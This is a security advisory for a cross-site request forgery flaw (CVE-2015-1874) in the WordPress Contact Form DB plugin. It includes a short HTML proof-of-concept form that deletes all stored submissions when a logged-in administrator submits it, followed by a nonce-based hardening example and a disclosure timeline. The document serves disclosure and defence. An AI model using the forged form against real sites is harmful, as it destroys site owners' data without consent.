WordPress Contact Form DB 2.8.29 Cross Site Request Forgery
2015-03-04T00:00:00
ID: PACKETSTORM:130654 | Type: packetstorm | Reporter: Tom Adams | Modified: 2015-03-04T00:00:00
Description
Details
================
Software: Contact Form DB
Version: 2.8.29
Homepage: https://wordpress.org/plugins/contact-form-7-to-database-extension/
Advisory report: https://security.dxw.com/advisories/csrf-in-contact-form-db-allows-attacker-to-delete-all-stored-form-submissions/
CVE: CVE-2015-1874
CVSS: 4.3 (Medium; AV:N/AC:M/Au:N/C:N/I:P/A:N)
Description
================
CSRF in Contact Form DB allows attacker to delete all stored form submissions
Vulnerability
================
An attacker able to convince a logged-in admin user to follow a link (for instance via spearphishing) will be able to cause all records stored by this plugin to be removed.
Proof of concept
================
If a logged-in administrator user clicks the submit button on this form, all records stored by the plugin will be deleted (in a real attack the form can be made to auto-submit using JavaScript).
<form action="http://localhost/wp-admin/admin.php?page=CF7DBPluginSubmissions" method="post">
<input name="all" type="text" value="y">
<input name="delete" type="text" value="y">
<input type="submit">
</form>
Mitigations
================
Upgrade to version 2.8.32 or later
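The root cause is a state-changing admin action that accepts any POST carrying all=y and delete=y, with nothing that ties the request to a page the administrator actually loaded on the site. The following is an added illustration of how such a handler is normally hardened in WordPress with a capability check plus a nonce; it is not the Contact Form DB plugin's code (the plugin's fixed version is not reproduced in this advisory), and every cfdb_example_* name and the table name are hypothetical. The WordPress API calls (current_user_can, wp_nonce_field, check_admin_referer, wp_safe_redirect, submit_button) are real core functions.

```php
<?php
// Added example, not the plugin's own code. Shows the two checks whose absence
// makes a "delete everything" admin action forgeable from a third-party page:
//   1. a capability check (is this user allowed to do this at all?)
//   2. a nonce check (did this request originate from a form WordPress rendered
//      for this user, rather than from a cross-site form like the PoC above?)
// All cfdb_example_* identifiers and the table name are hypothetical.

// Action string bound into the nonce. Keep it specific to this one operation so a
// nonce issued for some other form on the site cannot be replayed here.
const CFDB_EXAMPLE_DELETE_ALL_ACTION = 'cfdb_example_delete_all_submissions';
const CFDB_EXAMPLE_PAGE_SLUG         = 'CF7DBPluginSubmissions';

/**
 * Render the confirmation form on the plugin's admin page.
 * wp_nonce_field() emits a hidden "_wpnonce" input whose value is derived from
 * the current user's session and expires after a short window, so a page on
 * another origin cannot know a valid value to include in a forged POST.
 */
function cfdb_example_render_delete_all_form() {
    if ( ! current_user_can( 'manage_options' ) ) {
        return; // never even offer the control to lower-privileged users
    }
    ?>
    <form method="post"
          action="<?php echo esc_url( admin_url( 'admin.php?page=' . CFDB_EXAMPLE_PAGE_SLUG ) ); ?>">
        <?php wp_nonce_field( CFDB_EXAMPLE_DELETE_ALL_ACTION ); ?>
        <input type="hidden" name="all" value="y">
        <input type="hidden" name="delete" value="y">
        <?php submit_button( 'Delete all submissions', 'delete' ); ?>
    </form>
    <?php
}

/**
 * Handle the POST. Order matters: refuse unprivileged users first, then verify
 * the nonce, and only then touch the database.
 */
function cfdb_example_handle_delete_all() {
    // Only react to an explicit POST on our own page carrying both flags.
    if ( 'POST' !== ( $_SERVER['REQUEST_METHOD'] ?? '' )
        || ( $_GET['page'] ?? '' ) !== CFDB_EXAMPLE_PAGE_SLUG
        || empty( $_POST['all'] ) || empty( $_POST['delete'] ) ) {
        return;
    }

    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }

    // check_admin_referer() runs wp_verify_nonce() on $_POST['_wpnonce'] and
    // calls wp_die() when the nonce is missing, expired or issued for a
    // different action/user. A forged cross-site form stops here.
    check_admin_referer( CFDB_EXAMPLE_DELETE_ALL_ACTION );

    cfdb_example_delete_all_records();

    // Redirect after POST so a browser refresh does not re-submit the action.
    wp_safe_redirect( admin_url( 'admin.php?page=' . CFDB_EXAMPLE_PAGE_SLUG . '&deleted=1' ) );
    exit;
}

/** Destructive step, reached only after both checks above have passed. */
function cfdb_example_delete_all_records() {
    global $wpdb;
    // Hypothetical table; the advisory does not show the plugin's schema.
    $table = $wpdb->prefix . 'cfdb_example_submissions';
    $wpdb->query( "DELETE FROM {$table}" ); // table name is a constant, not user input
}

add_action( 'admin_init', 'cfdb_example_handle_delete_all' );
```

The capability check alone would not have prevented this issue, because the victim in the advisory is already an administrator; it is the nonce that distinguishes a request the admin intentionally submitted from one their browser was tricked into sending. When auditing a plugin for this class of bug, look for every handler that changes state on POST (or GET) parameters and confirm it calls check_admin_referer(), check_ajax_referer() or wp_verify_nonce() before acting.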
Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
This vulnerability will be published if we do not receive a response to this report within 14 days.
Timeline
================
2015-02-05: Discovered
2015-02-17: Reported to vendor by email
2015-02-22: Vendor responded and agreed a schedule for fix
2015-02-23: Vendor published a fix in version 2.8.32
2015-03-04: Advisory published
Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.
References
================
Packet Storm: https://packetstormsecurity.com/files/130654/WordPress-Contact-Form-DB-2.8.29-Cross-Site-Request-Forgery.html (source file: https://packetstormsecurity.com/files/download/130654/wpcontactformdb-xsrf.txt)
WPScan (WPVDB-ID:F781F36D-8760-4E53-8DD3-7CFBA1D21EE2): "Contact Form DB <= 2.8.29 - Cross-Site Request Forgery (CSRF)". The contact-form-7-to-database-extension WordPress plugin was affected by a Cross-Site Request Forgery (CSRF) security vulnerability. CVSS 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P). https://wpscan.com/vulnerability/f781f36d-8760-4e53-8dd3-7cfba1d21ee2
Patchstack (PATCHSTACK:4BB30869EF860351F4C3F7E5768368C2, published 2015-02-17): "WordPress Contact Form DB Plugin <= 2.8.31 - CSRF". Because of this vulnerability, the attackers can hijack the authentication of administrators for requests that delete all plugin records. Solution: upgrade the plugin. CVSS 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P). https://patchstack.com/database/vulnerability/contact-form-db/wordpress-contact-form-db-plugin-2-8-31-csrf
NVD (CVE-2015-1874, CWE-352, published 2015-03-09, modified 2016-08-04): Cross-site request forgery (CSRF) vulnerability in the Contact Form DB (aka CFDB and contact-form-7-to-database-extension) plugin before 2.8.32 for WordPress allows remote attackers to hijack the authentication of administrators for requests that delete all plugin records via a request in the CF7DBPluginSubmissions page to wp-admin/admin.php. CVSS 2.0 base score 6.8, Medium (AV:N/AC:M/Au:N/C:P/I:P/A:P; exploitability 8.6, impact 6.4, user interaction required). CPE: cpe:2.3:a:cfdbplugin:contact_form_db:2.8.31:*:*:*:*:wordpress:*:*. https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1874